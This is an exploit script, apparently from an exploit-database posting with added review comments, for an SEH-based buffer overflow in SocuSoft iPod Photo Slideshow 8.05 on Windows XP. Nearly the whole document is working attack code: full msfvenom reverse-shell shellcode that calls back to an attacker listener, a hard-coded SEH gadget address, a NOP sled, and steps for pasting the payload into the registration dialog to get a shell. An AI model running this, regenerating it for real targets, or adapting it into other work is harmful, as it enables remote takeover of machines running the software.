SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)
来源:@Pwsecspirit 作者:Singh 发布时间:2018-09-11
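# Exploit Title: SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH)
# Date: 2018-09-08
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link: http://www.dvd-photo-slideshow.com/ipod-photo-slideshow.html
# Tested Version: 8.05
# Tested on OS: Windows XP Service Pack 3 x86
# Reported but got no reply back
#
# Steps to Reproduce:
# 1. Start a listener on the attacker box that matches the shellcode's LHOST/LPORT
#    (the embedded shellcode calls back to 10.0.2.5:1337 -- regenerate it for your setup,
#    see the msfvenom line next to SHELLCODE below).
# 2. Run this script; it writes the payload to "exploit.txt".
# 3. Copy the content of "exploit.txt".
# 4. Start the program. In the new window click "Help" > "Register ...".
# 5. Paste the content of "exploit.txt" into the fields "Registration Name" + "Registration Key",
#    then click "Apply" > "Ok". A reverse shell connects back to the listener.
#
# NOTE(review): the payload is raw binary (bytes 0x80-0xff in the NOP sled, the SEH address
# and the shellcode). Moving it through a text editor and the clipboard is only faithful if
# the editor opens the file with a single-byte code page that round-trips every byte; if the
# program receives mangled bytes the SEH overwrite may still fire but the shellcode will not
# run. The script is written to run unchanged on Python 2.6+ and Python 3: the payload is
# built as bytes and written in binary mode so no text-mode newline or charset translation
# can alter it.

"""Build the SEH-overwrite payload for SocuSoft iPod Photo Slideshow 8.05 and write it to disk."""

# Offset from the start of the field to the SEH record (nSEH, then SEH), expressed as the
# original author found it. NOTE(review): the "- 36" is not explained in the original; the
# resulting 512-byte offset is the value to re-verify with a cyclic pattern on any other build.
OFFSET = 548 - 36

# nSEH: short jump forward 6 bytes (over the 2 trailing NOPs and the 4-byte SEH address)
# into the NOP sled that precedes the shellcode.
NSEH = b"\xeb\x06\x90\x90"

# SEH: 0x1004793e : pop edi # pop esi # ret | ascii {PAGE_EXECUTE_READ} [DVDPhotoData.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.5.0
# (C:\Program Files\Socusoft\Socusoft iPod Photo Slideshow\DVDPhotoData.dll)
# Written little-endian. The address is tied to that exact DLL version; the module has no
# ASLR/rebase/SafeSEH, which is why a hard-coded address is reliable here.
SEH = b"\x3e\x79\x04\x10"

# Sled between the SEH record and the decoder so the short jump does not have to be exact.
NOPS = b"\x90" * 18

# Bytes the original author excluded from the shellcode (msfvenom -b); presumably the input
# path stops or mangles on them. build_payload() refuses to emit a payload containing any of them.
BAD_CHARS = b"\x00\x0a\x0d"

# Total size of the content pasted into the field; the remainder after the shellcode is filler.
TOTAL_LEN = 1500

OUTPUT_FILE = "exploit.txt"

# sudo msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.0.2.5 LPORT=1337
#   -b '\x00\x0a\x0d' -f python
# Regenerate with your own LHOST/LPORT and keep the -b list so it stays free of BAD_CHARS.
SHELLCODE = (
    b"\xb8\x4c\xab\xe1\x3c\xd9\xd0\xd9\x74\x24\xf4\x5b\x33"
    b"\xc9\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\x0f\xa5\x03"
    b"\xc9\x73\x51\x41\x32\x8b\xa2\x26\xba\x6e\x93\x66\xd8"
    b"\xfb\x84\x56\xaa\xa9\x28\x1c\xfe\x59\xba\x50\xd7\x6e"
    b"\x0b\xde\x01\x41\x8c\x73\x71\xc0\x0e\x8e\xa6\x22\x2e"
    b"\x41\xbb\x23\x77\xbc\x36\x71\x20\xca\xe5\x65\x45\x86"
    b"\x35\x0e\x15\x06\x3e\xf3\xee\x29\x6f\xa2\x65\x70\xaf"
    b"\x45\xa9\x08\xe6\x5d\xae\x35\xb0\xd6\x04\xc1\x43\x3e"
    b"\x55\x2a\xef\x7f\x59\xd9\xf1\xb8\x5e\x02\x84\xb0\x9c"
    b"\xbf\x9f\x07\xde\x1b\x15\x93\x78\xef\x8d\x7f\x78\x3c"
    b"\x4b\xf4\x76\x89\x1f\x52\x9b\x0c\xf3\xe9\xa7\x85\xf2"
    b"\x3d\x2e\xdd\xd0\x99\x6a\x85\x79\xb8\xd6\x68\x85\xda"
    b"\xb8\xd5\x23\x91\x55\x01\x5e\xf8\x31\xe6\x53\x02\xc2"
    b"\x60\xe3\x71\xf0\x2f\x5f\x1d\xb8\xb8\x79\xda\xbf\x92"
    b"\x3e\x74\x3e\x1d\x3f\x5d\x85\x49\x6f\xf5\x2c\xf2\xe4"
    b"\x05\xd0\x27\xaa\x55\x7e\x98\x0b\x05\x3e\x48\xe4\x4f"
    b"\xb1\xb7\x14\x70\x1b\xd0\xbf\x8b\xcc\xd5\x3f\x91\x09"
    b"\x82\x3d\x95\x14\x6b\xcb\x73\x7c\x9b\x9d\x2c\xe9\x02"
    b"\x84\xa6\x88\xcb\x12\xc3\x8b\x40\x91\x34\x45\xa1\xdc"
    b"\x26\x32\x41\xab\x14\x95\x5e\x01\x30\x79\xcc\xce\xc0"
    b"\xf4\xed\x58\x97\x51\xc3\x90\x7d\x4c\x7a\x0b\x63\x8d"
    b"\x1a\x74\x27\x4a\xdf\x7b\xa6\x1f\x5b\x58\xb8\xd9\x64"
    b"\xe4\xec\xb5\x32\xb2\x5a\x70\xed\x74\x34\x2a\x42\xdf"
    b"\xd0\xab\xa8\xe0\xa6\xb3\xe4\x96\x46\x05\x51\xef\x79"
    b"\xaa\x35\xe7\x02\xd6\xa5\x08\xd9\x52\xd5\x42\x43\xf2"
    b"\x7e\x0b\x16\x46\xe3\xac\xcd\x85\x1a\x2f\xe7\x75\xd9"
    b"\x2f\x82\x70\xa5\xf7\x7f\x09\xb6\x9d\x7f\xbe\xb7\xb7"
)


def build_payload():
    """Assemble the field content: filler + nSEH + SEH + NOP sled + shellcode + pad.

    Returns:
        bytes of length TOTAL_LEN laid out as
        ``"A" * OFFSET | NSEH | SEH | NOPS | SHELLCODE | "C" * rest``.

    Raises:
        ValueError: if the fixed part already exceeds TOTAL_LEN (the original silently
            produced an over-long payload because the negative pad length became an
            empty string), or if any BAD_CHARS byte ends up in the payload (a regenerated
            shellcode without ``-b`` would otherwise be written without warning).
    """
    fixed = b"A" * OFFSET + NSEH + SEH + NOPS + SHELLCODE
    if len(fixed) > TOTAL_LEN:
        raise ValueError(
            "fixed part is %d bytes, larger than TOTAL_LEN=%d" % (len(fixed), TOTAL_LEN)
        )
    payload = fixed + b"C" * (TOTAL_LEN - len(fixed))
    # One-byte slices keep this working on both Python 2 (str bytes) and Python 3 (ints).
    for i in range(len(BAD_CHARS)):
        bad = BAD_CHARS[i:i + 1]
        if bad in payload:
            raise ValueError("payload contains bad char %r" % bad)
    return payload


def main():
    """Write the payload to OUTPUT_FILE in binary mode; report, but do not hide, I/O errors."""
    exploit = build_payload()
    print("[+] Creating %s bytes evil payload.." % len(exploit))
    try:
        # "wb" + context manager: no newline/charset translation of the binary payload and
        # the handle is closed even when write() fails.
        with open(OUTPUT_FILE, "wb") as f:
            f.write(exploit)
    except (IOError, OSError) as exc:
        # Narrow catch: a bare "except:" also swallowed KeyboardInterrupt and hid the cause.
        print("File cannot be created: %s" % exc)
        return
    print("[+] File created!")


if __name__ == "__main__":
    main()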